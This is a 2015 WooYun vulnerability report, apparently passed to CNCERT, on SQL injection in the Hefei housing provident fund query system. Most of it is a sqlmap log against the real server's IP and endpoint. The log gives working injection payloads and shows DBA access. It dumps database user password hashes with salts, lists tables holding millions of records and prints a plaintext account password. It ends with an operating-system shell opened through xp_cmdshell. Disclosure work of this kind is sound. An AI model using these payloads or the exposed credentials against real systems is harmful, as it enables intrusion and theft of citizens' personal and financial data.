当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0134350

漏洞标题:合肥市住房公积金查询系统存在SQL注入(数百万信息+可系统交互shell)

相关厂商:合肥住房公积金查询

漏洞作者: 路人甲

提交时间:2015-08-17 18:15

修复时间:2015-10-03 09:44

公开时间:2015-10-03 09:44

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-17: 细节已通知厂商并且等待厂商处理中
2015-08-19: 厂商已经确认,细节仅向厂商公开
2015-08-29: 细节向核心白帽子及相关领域专家公开
2015-09-08: 细节向普通白帽子公开
2015-09-18: 细节向实习白帽子公开
2015-10-03: 细节向公众公开

简要描述:

已经有洞主提交过了,但在该地址中还有另一个参数同样存在SQL注入,而且洞主提交的还依旧没有修复,被利用迟早的事情!~~~

详细说明:

WooYun: 合肥市住房公积金查询系统存在post注入(可系统交互shell/影响公积金用户)
还有一个参数存在注入,洞主提交的还没有修复,利用依旧可以!~~~
抓包

http://220.178.98.86/hfgjj/jsp/web/public/search/getPw.jsp (POST)
zgyhzh=1&xm=2&sjhm=3


[17:02:53] [INFO] parsing HTTP request from 'E:\8.txt'
[17:02:53] [INFO] testing connection to the target URL
[17:02:53] [INFO] testing if the target URL is stable. This can take a couple of
 seconds
you provided a HTTP Cookie header value. The target URL provided its own cookies
 within the HTTP Set-Cookie header which intersect with yours. Do you want to me
rge them in futher requests? [Y/n] y
[17:02:57] [INFO] target URL is stable
[17:02:57] [INFO] testing if POST parameter 'zgyhzh' is dynamic
[17:02:57] [WARNING] POST parameter 'zgyhzh' does not appear dynamic
[17:02:57] [WARNING] heuristic (basic) test shows that POST parameter 'zgyhzh' m
ight not be injectable
[17:02:57] [INFO] testing for SQL injection on POST parameter 'zgyhzh'
[17:02:57] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[17:02:59] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[17:03:00] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[17:03:01] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[17:03:01] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[17:03:02] [INFO] testing 'MySQL inline queries'
[17:03:02] [INFO] testing 'PostgreSQL inline queries'
[17:03:03] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[17:03:03] [INFO] testing 'Oracle inline queries'
[17:03:03] [INFO] testing 'SQLite inline queries'
[17:03:03] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[17:03:04] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[17:03:05] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[17:03:16] [INFO] POST parameter 'zgyhzh' seems to be 'Microsoft SQL Server/Syba
se stacked queries' injectable
[17:03:16] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[17:03:26] [INFO] POST parameter 'zgyhzh' seems to be 'Microsoft SQL Server/Syba
se time-based blind' injectable
[17:03:26] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[17:03:26] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[17:03:27] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for current UNION query injection technique test
[17:03:27] [INFO] target URL appears to have 9 columns in query
[17:03:29] [INFO] POST parameter 'zgyhzh' is 'Generic UNION query (NULL) - 1 to
20 columns' injectable
POST parameter 'zgyhzh' is vulnerable. Do you want to keep testing the others (i
f any)? [y/N] y
[17:03:31] [INFO] testing if POST parameter 'xm' is dynamic
[17:03:31] [WARNING] POST parameter 'xm' does not appear dynamic
[17:03:31] [WARNING] heuristic (basic) test shows that POST parameter 'xm' might
 not be injectable
[17:03:31] [INFO] testing for SQL injection on POST parameter 'xm'
[17:03:32] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[17:03:34] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[17:03:35] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[17:03:36] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[17:03:37] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[17:03:38] [INFO] testing 'MySQL inline queries'
[17:03:38] [INFO] testing 'PostgreSQL inline queries'
[17:03:38] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[17:03:38] [INFO] testing 'Oracle inline queries'
[17:03:38] [INFO] testing 'SQLite inline queries'
[17:03:39] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[17:03:39] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[17:03:40] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[17:03:41] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[17:03:42] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[17:03:43] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[17:03:44] [INFO] testing 'Oracle AND time-based blind'
[17:03:45] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
injection not exploitable with NULL values. Do you want to try with a random int
eger value for option '--union-char'? [Y/n] y
[17:03:58] [WARNING] if UNION based SQL injection is not detected, please consid
er forcing the back-end DBMS (e.g. --dbms=mysql)
[17:04:12] [INFO] testing 'Generic UNION query (77) - 1 to 10 columns'
[17:04:12] [WARNING] using unescaped version of the test because of zero knowled
ge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[17:04:12] [WARNING] applying generic concatenation with double pipes ('||')
[17:04:28] [WARNING] POST parameter 'xm' is not injectable
[17:04:28] [INFO] testing if POST parameter 'sjhm' is dynamic
[17:04:28] [WARNING] POST parameter 'sjhm' does not appear dynamic
[17:04:29] [WARNING] heuristic (basic) test shows that POST parameter 'sjhm' mig
ht not be injectable
[17:04:29] [INFO] testing for SQL injection on POST parameter 'sjhm'
[17:04:29] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[17:04:31] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[17:04:32] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[17:04:32] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[17:04:33] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[17:04:34] [INFO] testing 'MySQL inline queries'
[17:04:34] [INFO] testing 'PostgreSQL inline queries'
[17:04:34] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[17:04:34] [INFO] testing 'Oracle inline queries'
[17:04:34] [INFO] testing 'SQLite inline queries'
[17:04:34] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[17:04:36] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[17:04:36] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[17:04:47] [INFO] POST parameter 'sjhm' seems to be 'Microsoft SQL Server/Sybase
 stacked queries' injectable
[17:04:47] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[17:04:57] [INFO] POST parameter 'sjhm' seems to be 'Microsoft SQL Server/Sybase
 time-based blind' injectable
[17:04:57] [INFO] testing 'Generic UNION query (77) - 1 to 20 columns'
[17:04:58] [INFO] POST parameter 'sjhm' is 'Generic UNION query (77) - 1 to 20 c
olumns' injectable
POST parameter 'sjhm' is vulnerable. Do you want to keep testing the others (if
any)? [y/N] y
sqlmap identified the following injection points with a total of 478 HTTP(s) req
uests:
---
Place: POST
Parameter: zgyhzh
    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: zgyhzh=1' UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(119)+CHAR(118)+
CHAR(110)+CHAR(113)+CHAR(66)+CHAR(104)+CHAR(78)+CHAR(98)+CHAR(82)+CHAR(119)+CHAR
(118)+CHAR(111)+CHAR(104)+CHAR(99)+CHAR(113)+CHAR(121)+CHAR(106)+CHAR(108)+CHAR(
113),NULL,NULL,NULL,NULL,NULL,NULL-- &xm=2&sjhm=3
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: zgyhzh=1'; WAITFOR DELAY '0:0:5'--&xm=2&sjhm=3
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: zgyhzh=1' WAITFOR DELAY '0:0:5'--&xm=2&sjhm=3
Place: POST
Parameter: sjhm
    Type: UNION query
    Title: Generic UNION query (77) - 9 columns
    Payload: zgyhzh=1&xm=2&sjhm=3' UNION ALL SELECT 77,77,CHAR(113)+CHAR(119)+CH
AR(118)+CHAR(110)+CHAR(113)+CHAR(86)+CHAR(77)+CHAR(112)+CHAR(67)+CHAR(99)+CHAR(7
4)+CHAR(70)+CHAR(100)+CHAR(86)+CHAR(83)+CHAR(113)+CHAR(121)+CHAR(106)+CHAR(108)+
CHAR(113),77,77,77,77,77,77--
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: zgyhzh=1&xm=2&sjhm=3'; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: zgyhzh=1&xm=2&sjhm=3' WAITFOR DELAY '0:0:5'--
---
there were multiple injection points, please select the one to use for following
 injections:
[0] place: POST, parameter: zgyhzh, type: Single quoted string (default)
[1] place: POST, parameter: sjhm, type: Single quoted string
[q] Quit
> 0
[17:05:13] [INFO] testing Microsoft SQL Server
[17:05:14] [INFO] confirming Microsoft SQL Server
[17:05:15] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: Apache 2.2.22, JSP
back-end DBMS: Microsoft SQL Server 2000
[17:08:11] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: Apache 2.2.22, JSP
back-end DBMS: Microsoft SQL Server 2000
[17:08:11] [INFO] fetching current user
you provided a HTTP Cookie header value. The target URL provided its own cookies
 within the HTTP Set-Cookie header which intersect with yours. Do you want to me
rge them in futher requests? [Y/n] y
current user:    'sa'
[17:08:14] [INFO] fetching current database
current database:    'hfgjj'
[17:08:14] [INFO] testing if current user is DBA
current user is DBA:    True
DBA权限
there were multiple injection points, please select the one to use for following
 injections:
[0] place: POST, parameter: sjhm, type: Single quoted string (default)
[1] place: POST, parameter: zgyhzh, type: Single quoted string
[q] Quit
> 1
[17:09:10] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: Apache 2.2.22, JSP
back-end DBMS: Microsoft SQL Server 2000
[17:09:10] [INFO] fetching current database
current database:    'hfgjj'
[17:09:10] [INFO] fetching database users
[17:09:10] [INFO] the SQL query used returns 4 entries
[17:09:10] [INFO] starting 4 threads
[17:09:10] [INFO] resumed: "12329"
[17:09:10] [INFO] resumed: "sa"
[17:09:10] [INFO] resumed: "BUILTIN\\\\Administrators"
[17:09:10] [INFO] resumed: "hengke"
database management system users [4]:
[*] 12329
[*] BUILTIN\\Administrators
[*] hengke
[*] sa
[17:09:10] [INFO] fetching database users password hashes
you provided a HTTP Cookie header value. The target URL provided its own cookies
 within the HTTP Set-Cookie header which intersect with yours. Do you want to me
rge them in futher requests? [Y/n] y
[17:09:12] [INFO] the SQL query used returns 5 entries
[17:09:12] [INFO] starting 5 threads
[17:09:12] [INFO] retrieved: "12329","0x0100f07081700cfaf759e66438ea2f3ba8716...
[17:09:13] [INFO] retrieved: " "," "
[17:09:13] [INFO] retrieved: "BUILTIN\\\\Administrators"," "
[17:09:13] [INFO] retrieved: "hengke","0x0100db4afb45cf379dd1faabfd592a4b6c83...
[17:09:13] [INFO] retrieved: "sa","0x0100d341535b397ce619be87c4a2592e80b579c0...
do you want to store hashes to a temporary file for eventual further processing
with other tools [y/N] n
do you want to perform a dictionary-based attack against retrieved password hash
es? [Y/n/q] n
database management system users password hashes:
[*] 12329 [1]:
    password hash: 0x0100f07081700cfaf759e66438ea2f3ba8716645d9e13d8ddb7e0cfaf75
9e66438ea2f3ba8716645d9e13d8ddb7e
        header: 0x0100
        salt: f0708170
        mixedcase: 0cfaf759e66438ea2f3ba8716645d9e13d8ddb7e
        uppercase: 0cfaf759e66438ea2f3ba8716645d9e13d8ddb7e
[*] BUILTIN\\Administrators [1]:
    password hash: NULL
[*] hengke [1]:
    password hash: 0x0100db4afb45cf379dd1faabfd592a4b6c83d0b56e1c1d599309ba0ec5c
2775dace3924d902c8041900c6b0df944
        header: 0x0100
        salt: db4afb45
        mixedcase: cf379dd1faabfd592a4b6c83d0b56e1c1d599309
        uppercase: ba0ec5c2775dace3924d902c8041900c6b0df944
[*] sa [1]:
    password hash: 0x0100d341535b397ce619be87c4a2592e80b579c006713a72aacc606f04f
250d80f97cd3d5f7c97fcaad96fba05ae
        header: 0x0100
        salt: d341535b
        mixedcase: 397ce619be87c4a2592e80b579c006713a72aacc
        uppercase: 606f04f250d80f97cd3d5f7c97fcaad96fba05ae
[17:10:12] [INFO] the SQL query used returns 7 entries
[17:10:12] [INFO] starting 7 threads
[17:10:12] [INFO] retrieved: "msdb"
[17:10:12] [INFO] retrieved: "hfgjj"
[17:10:12] [INFO] retrieved: "master"
[17:10:12] [INFO] retrieved: "hengke"
[17:10:12] [INFO] retrieved: "gjj"
[17:10:12] [INFO] retrieved: "model"
[17:10:12] [INFO] retrieved: "tempdb"
available databases [7]:
[*] gjj
[*] hengke
[*] hfgjj
[*] master
[*] model
[*] msdb
[*] tempdb
[17:10:56] [INFO] the SQL query used returns 109 entries
[17:10:56] [INFO] starting 10 threads
[17:10:56] [INFO] retrieved: "dbo.cms_hdjl"
[17:10:56] [INFO] retrieved: "dbo.D99_REG"
[17:10:57] [INFO] retrieved: "dbo.advise_upload"
[17:10:57] [INFO] retrieved: "dbo.class_supply"
[17:10:57] [INFO] retrieved: "dbo.culture_info"
[17:10:57] [INFO] retrieved: "dbo.CULTURE_INVESTDETAIL"
[17:10:57] [INFO] retrieved: "dbo.dtproperties"
[17:10:58] [INFO] retrieved: "dbo.D99_CMD"
[17:10:58] [INFO] retrieved: "dbo.DIY_TEMPTALBLE"
[17:10:58] [INFO] retrieved: "dbo.h_fangjian"
[17:10:58] [INFO] retrieved: "dbo.fellow_link"
[17:10:58] [INFO] retrieved: "dbo.culture_replyinfo"
[17:10:58] [INFO] retrieved: "dbo.fellow_class"
[17:10:58] [INFO] retrieved: "dbo.h_loudong"
[17:10:58] [INFO] retrieved: "dbo.fagui"
[17:10:58] [INFO] retrieved: "dbo.focus_user"
[17:10:59] [INFO] retrieved: "dbo.hdzx"
[17:10:59] [INFO] retrieved: "dbo.CULTURE_INVESTED"
[17:10:59] [INFO] retrieved: "dbo.D99_Tmp"
[17:10:59] [INFO] retrieved: "dbo.join_table"
[17:10:59] [INFO] retrieved: "dbo.h_quyu"
[17:10:59] [INFO] retrieved: "dbo.mail_material"
[17:11:00] [INFO] retrieved: "dbo.INNER_INFO"
[17:11:00] [INFO] retrieved: "dbo.kill_kk"
[17:11:00] [INFO] retrieved: "dbo.pbcatfmt"
[17:11:00] [INFO] retrieved: "dbo.pbcattbl"
[17:11:00] [INFO] retrieved: "dbo.pbcatcol"
[17:11:01] [INFO] retrieved: "dbo.pbcatvld"
[17:11:01] [INFO] retrieved: "dbo.sqlmapoutput"
[17:11:01] [INFO] retrieved: "dbo.renyuan_dw"
[17:11:01] [INFO] retrieved: "dbo.sys_log"
[17:11:01] [INFO] retrieved: "dbo.SYS_MENU"
[17:11:02] [INFO] retrieved: "dbo.supply_note"
[17:11:02] [INFO] retrieved: "dbo.sys_role_resource"
[17:11:02] [INFO] retrieved: "dbo.sys_siteprevilige"
[17:11:02] [INFO] retrieved: "dbo.sys_role_resource"
[17:11:02] [INFO] retrieved: "dbo.sys_resource"
[17:11:03] [INFO] retrieved: "dbo.sys_unit_role"
[17:11:03] [INFO] retrieved: "dbo.sys_siteprevilige"
[17:11:03] [INFO] retrieved: "dbo.sys_unittype"
[17:11:03] [INFO] retrieved: "dbo.sys_unit_role"
[17:11:03] [INFO] retrieved: "dbo.SYS_SITERIGHT"
[17:11:03] [INFO] retrieved: "dbo.LIFA_NEWS"
[17:11:04] [INFO] retrieved: "dbo.sys_userproperty"
[17:11:04] [INFO] retrieved: "dbo.pbcatedt"
[17:11:04] [INFO] retrieved: "dbo.SYS_USERGROUP"
[17:11:04] [INFO] retrieved: "dbo.sys_user_role"
[17:11:05] [INFO] retrieved: "dbo.renyuan_dw"
[17:11:05] [INFO] retrieved: "dbo.sys_user_role"
[17:11:05] [INFO] retrieved: "dbo.sys_user_unit"
[17:11:05] [INFO] retrieved: "dbo.tongji"
[17:11:05] [INFO] retrieved: "dbo.syssegments"
[17:11:05] [INFO] retrieved: "dbo.supply_replynote"
[17:11:06] [INFO] retrieved: "dbo.v_168_dwhjqk_old"
[17:11:06] [INFO] retrieved: "dbo.tz_js"
[17:11:06] [INFO] retrieved: "dbo.tz_note"
[17:11:06] [INFO] retrieved: "dbo.v_168_dwhjqk_old"
[17:11:06] [INFO] retrieved: "dbo.v_09_10_xh"
[17:11:06] [INFO] retrieved: "dbo.v_168_dz_old_61"
[17:11:07] [INFO] retrieved: "dbo.v_168_dwzz_old"
[17:11:07] [INFO] retrieved: "dbo.v_168_dwinfo"
[17:11:07] [INFO] retrieved: "dbo.v_168_dwzz_old"
[17:11:07] [INFO] retrieved: "dbo.v_168_dz_old_61"
[17:11:07] [INFO] retrieved: "dbo.v_168_dwdz"
[17:11:07] [INFO] retrieved: "dbo.v_168_dz_old_65"
[17:11:08] [INFO] retrieved: "dbo.v_168_dz_old_67"
[17:11:08] [INFO] retrieved: "dbo.v_168_dz_old_66"
[17:11:08] [INFO] retrieved: "dbo.hero_table"
[17:11:08] [INFO] retrieved: "dbo.v_168_dz1"
[17:11:09] [INFO] retrieved: "dbo.v_168_dz_old_68"
[17:11:09] [INFO] retrieved: "dbo.v_168_dz_old_yl"
[17:11:09] [INFO] retrieved: "dbo.v_168_dz2"
[17:11:09] [INFO] retrieved: "dbo.v_168_gjd"
[17:11:09] [INFO] retrieved: "dbo.v_dw_gzmx"
[17:11:09] [INFO] retrieved: "dbo.v_dw_gjmx_old"
[17:11:09] [INFO] retrieved: "dbo.v_dwhjqk_old"
[17:11:10] [INFO] retrieved: "dbo.v_dwhjqk_old"
[17:11:10] [INFO] retrieved: "dbo.v_168_info_old"
[17:11:10] [INFO] retrieved: "dbo.v_update_Time"
[17:11:10] [INFO] retrieved: "dbo.v_save_etps_password"
[17:11:10] [INFO] retrieved: "dbo.v_save_password"
[17:11:11] [INFO] retrieved: "dbo.v_168_info_old"
[17:11:11] [INFO] retrieved: "dbo.v_web_hdmx"
[17:11:11] [INFO] retrieved: "dbo.v_house_info"
[17:11:11] [INFO] retrieved: "dbo.v_web_hdqk1"
[17:11:11] [INFO] retrieved: "dbo.v_web_hdqk1"
[17:11:11] [INFO] retrieved: "dbo.v_web_sdqk"
[17:11:12] [INFO] retrieved: "dbo.v_web_shgc"
[17:11:12] [INFO] retrieved: "dbo.v_dwzz_old"
[17:11:12] [INFO] retrieved: "dbo.v_web_wtmx11"
[17:11:12] [INFO] retrieved: "dbo.v_web_wtmx10"
[17:11:13] [INFO] retrieved: "dbo.v_web_wtmx12"
[17:11:13] [INFO] retrieved: "dbo.v_web_wttqmx_old"
[17:11:13] [INFO] retrieved: "dbo.v_web_wttqmx_old"
[17:11:13] [INFO] retrieved: "dbo.web_dwinfo"
[17:11:13] [INFO] retrieved: "dbo.v_web_wttqmx_old"
[17:11:13] [INFO] retrieved: "dbo.xzsp_dw"
[17:11:13] [INFO] retrieved: "dbo.v_web_wtmx09"
[17:11:13] [INFO] retrieved: "dbo.WELFARE_NEWS"
[17:11:14] [INFO] retrieved: "dbo.sysconstraints"
[17:11:14] [INFO] retrieved: "dbo.zxbs"
[17:11:14] [INFO] retrieved: "dbo.zhut"
[17:11:15] [WARNING] cannot properly display Unicode characters inside Windows
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances
ll result in replacement with '?' character. Please, find proper character rep
sentation inside corresponding output files.
[17:11:15] [INFO] retrieved: "dbo.??"
[17:11:15] [INFO] retrieved: "dbo.wenjian"
[17:11:15] [INFO] retrieved: "dbo.xzsp_dw"
[17:11:15] [INFO] retrieved: "dbo.xzxk"
[17:11:16] [INFO] retrieved: "dbo.v_168_dz_old_61"
[17:11:16] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is
ing to retry the request
[17:11:16] [WARNING] if the problem persists please try to lower the number of
sed threads (option '--threads')
[17:11:18] [INFO] retrieved: "dbo.h_loupan"
[17:11:18] [INFO] retrieved: "dbo.v_dw_gjmx_old"
Database: hfgjj
[109 tables]
+----------------------+
| CULTURE_INVESTDETAIL |
| CULTURE_INVESTED     |
| D99_CMD              |
| D99_REG              |
| D99_Tmp              |
| DIY_TEMPTALBLE       |
| INNER_INFO           |
| LIFA_NEWS            |
| SYS_MENU             |
| SYS_SITERIGHT        |
| SYS_USERGROUP        |
| WELFARE_NEWS         |
| advise_upload        |
| class_supply         |
| cms_hdjl             |
| culture_info         |
| culture_replyinfo    |
| dtproperties         |
| fagui                |
| fellow_class         |
| fellow_link          |
| focus_user           |
| h_fangjian           |
| h_loudong            |
| h_loupan             |
| h_quyu               |
| hdzx                 |
| hero_table           |
| join_table           |
| kill_kk              |
| mail_material        |
| pbcatcol             |
| pbcatedt             |
| pbcatfmt             |
| pbcattbl             |
| pbcatvld             |
| renyuan_dw           |
| renyuan_dw           |
| sqlmapoutput         |
| supply_note          |
| supply_replynote     |
| sys_log              |
| sys_resource         |
| sys_role_resource    |
| sys_role_resource    |
| sys_siteprevilige    |
| sys_siteprevilige    |
| sys_unit_role        |
| sys_unit_role        |
| sys_unittype         |
| sys_user_role        |
| sys_user_role        |
| sys_user_unit        |
| sys_userproperty     |
| sysconstraints       |
| syssegments          |
| tongji               |
| tz_js                |
| tz_note              |
| v_09_10_xh           |
| v_168_dwdz           |
| v_168_dwhjqk_old     |
| v_168_dwhjqk_old     |
| v_168_dwinfo         |
| v_168_dwzz_old       |
| v_168_dwzz_old       |
| v_168_dz1            |
| v_168_dz2            |
| v_168_dz_old_61      |
| v_168_dz_old_61      |
| v_168_dz_old_61      |
| v_168_dz_old_65      |
| v_168_dz_old_66      |
| v_168_dz_old_67      |
| v_168_dz_old_68      |
| v_168_dz_old_yl      |
| v_168_gjd            |
| v_168_info_old       |
| v_168_info_old       |
| v_dw_gjmx_old        |
| v_dw_gjmx_old        |
| v_dw_gzmx            |
| v_dwhjqk_old         |
| v_dwhjqk_old         |
| v_dwzz_old           |
| v_house_info         |
| v_save_etps_password |
| v_save_password      |
| v_update_Time        |
| v_web_hdmx           |
| v_web_hdqk1          |
| v_web_hdqk1          |
| v_web_sdqk           |
| v_web_shgc           |
| v_web_wtmx09         |
| v_web_wtmx10         |
| v_web_wtmx11         |
| v_web_wtmx12         |
| v_web_wttqmx_old     |
| v_web_wttqmx_old     |
| v_web_wttqmx_old     |
| web_dwinfo           |
| wenjian              |
| xzsp_dw              |
| xzsp_dw              |
| xzxk                 |
| zhut                 |
| zxbs                 |
| ??                   |
+----------------------+
Database: hfgjj
+--------------------------+---------+
| Table                    | Entries |
+--------------------------+---------+
| dbo.v_168_dz1            | 7603650 |
| dbo.v_web_hdmx           | 6436608 |
| dbo.v_dw_gjmx_old        | 1220549 |
| dbo.v_dw_gjmx_old        | 1220549 |
| dbo.v_web_wttqmx_old     | 1071690 |
| dbo.v_web_wttqmx_old     | 1071690 |
| dbo.v_web_wttqmx_old     | 1071690 |
| dbo.v_save_password      | 895507  |
| dbo.v_web_shgc           | 497282  |
| dbo.v_168_dwhjqk_old     | 441669  |
| dbo.v_168_dwhjqk_old     | 441669  |
| dbo.v_dwhjqk_old         | 438713  |
| dbo.v_dwhjqk_old         | 438713  |
| dbo.v_168_dz_old_yl      | 424834  |
| dbo.v_168_info_old       | 374905  |
| dbo.v_168_info_old       | 374905  |
| dbo.v_web_wtmx12         | 238842  |
| dbo.v_168_dwzz_old       | 165814  |
| dbo.v_168_dwzz_old       | 165814  |
| dbo.v_168_dz2            | 147125  |
| dbo.v_web_wtmx10         | 120510  |
| dbo.v_web_wtmx11         | 89190   |
| dbo.v_dw_gzmx            | 76545   |
| dbo.v_dwzz_old           | 76088   |
| dbo.v_09_10_xh           | 59814   |
| dbo.v_web_wtmx09         | 34592   |
| dbo.v_web_hdqk1          | 29389   |
| dbo.v_web_hdqk1          | 29389   |
| dbo.sys_log              | 24920   |
| dbo.hdzx                 | 11659   |
| dbo.v_168_dwinfo         | 10587   |
| dbo.v_house_info         | 9579    |
| dbo.v_save_etps_password | 7666    |
| dbo.v_web_sdqk           | 4741    |
| dbo.tongji               | 4323    |
| dbo.web_dwinfo           | 3387    |
| dbo.v_168_dwdz           | 1043    |
| dbo.cms_hdjl             | 464     |
| dbo.SYS_SITERIGHT        | 360     |
| dbo.WELFARE_NEWS         | 257     |
| dbo.sys_role_resource    | 192     |
| dbo.sys_role_resource    | 192     |
| dbo.fagui                | 102     |
| dbo.wenjian              | 74      |
| dbo.supply_note          | 69      |
| dbo.sys_resource         | 60      |
| dbo.sys_user_role        | 47      |
| dbo.sys_user_role        | 47      |
| dbo.xzsp_dw              | 39      |
| dbo.xzsp_dw              | 39      |
| dbo.SYS_MENU             | 38      |
| dbo.mail_material        | 34      |
| dbo.supply_replynote     | 34      |
| dbo.sysconstraints       | 34      |
| dbo.focus_user           | 30      |
| dbo.pbcatcol             | 29      |
| dbo.kill_kk              | 21      |
| dbo.pbcatedt             | 21      |
| dbo.DIY_TEMPTALBLE       | 20      |
| dbo.pbcatfmt             | 20      |
| dbo.CULTURE_INVESTDETAIL | 13      |
| dbo.D99_CMD              | 12      |
| dbo.hero_table           | 12      |
| dbo.sys_user_unit        | 8       |
| dbo.h_quyu               | 7       |
| dbo.advise_upload        | 6       |
| dbo.xzxk                 | 6       |
| dbo.v_168_gjd            | 5       |
| dbo.INNER_INFO           | 4       |
| dbo.renyuan_dw           | 4       |
| dbo.renyuan_dw           | 4       |
| dbo.class_supply         | 3       |
| dbo.sqlmapoutput         | 3       |
| dbo.sys_unittype         | 3       |
| dbo.syssegments          | 3       |
| dbo.zxbs                 | 3       |
| dbo.CULTURE_INVESTED     | 2       |
| dbo.D99_Tmp              | 2       |
| dbo.fellow_class         | 2       |
| dbo.fellow_link          | 2       |
| dbo.h_loupan             | 2       |
| dbo.pbcattbl             | 2       |
| dbo.tz_js                | 2       |
| dbo.tz_note              | 2       |
| dbo.D99_REG              | 1       |
| dbo.h_loudong            | 1       |
| dbo.LIFA_NEWS            | 1       |
| dbo.sys_siteprevilige    | 1       |
| dbo.sys_siteprevilige    | 1       |
| dbo.v_update_Time        | 1       |
+--------------------------+---------+
上面数百万的信息可以被泄漏出去!~~~
Database: hfgjj
Table: v_save_password
[1 entry]
+-------------+------+--------------------+-------+-----------+-----------+-----
----+---------+----------+
| sjhm        | dxjs | ftime              | allIn | dwyhzh    | zgyhzh    | toda
yIn | enabled | password |
+-------------+------+--------------------+-------+-----------+-----------+-----
----+---------+----------+
| null        | 0    | 12 31 2014 12:58PM | 99    | 888880003 | 800978023 | 9
    | NULL    | s082812  |
+-------------+------+--------------------+-------+-----------+-----------+-----
----+---------+----------+
[17:21:09] [INFO] fingerprinting the back-end DBMS operating system version and
service pack
[17:21:09] [WARNING] time-based comparison needs larger statistical model. Makin
g a few dummy requests, please wait..
[17:21:11] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based payloads
[17:21:13] [INFO] the back-end DBMS operating system is Windows 2000 Service Pac
k 0
[17:21:13] [INFO] testing if current user is DBA
[17:21:13] [INFO] checking if xp_cmdshell extended procedure is available, pleas
e wait..
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n] y
[17:21:33] [INFO] xp_cmdshell extended procedure is available
[17:21:33] [INFO] testing if xp_cmdshell extended procedure is usable
[17:21:35] [INFO] the SQL query used returns 1 entries
[17:21:35] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
[17:21:35] [WARNING] multi-threading is considered unsafe in time-based data ret
rieval. Going to switch it off automatically
[17:21:51] [INFO] adjusting time delay to 4 seconds due to good response times
[17:22:20] [INFO] xp_cmdshell extended procedure is usable
[17:22:20] [INFO] going to use xp_cmdshell extended procedure for operating syst
em command execution
[17:22:20] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press EN
TER
os-shell> ipconfig
do you want to retrieve the command standard output? [Y/n/a] y
[17:22:31] [INFO] the SQL query used returns 12 entries
[17:22:31] [INFO] starting 10 threads
[17:22:32] [INFO] retrieved: 14
[17:22:41] [INFO] retrieved:
[17:22:46] [INFO] adjusting time delay to 3 seconds due to good response times
[17:22:51] [INFO] retrieved: Windows 2000 IP Configuration
[17:29:37] [INFO] retrieved:
[17:29:45] [INFO] retrieved: Ethernet a

漏洞证明:

如上

修复方案:

过滤修复,
更改权限

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-08-19 09:43

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给安徽分中心,由其后续协调网站管理单位处置。

最新状态:

暂无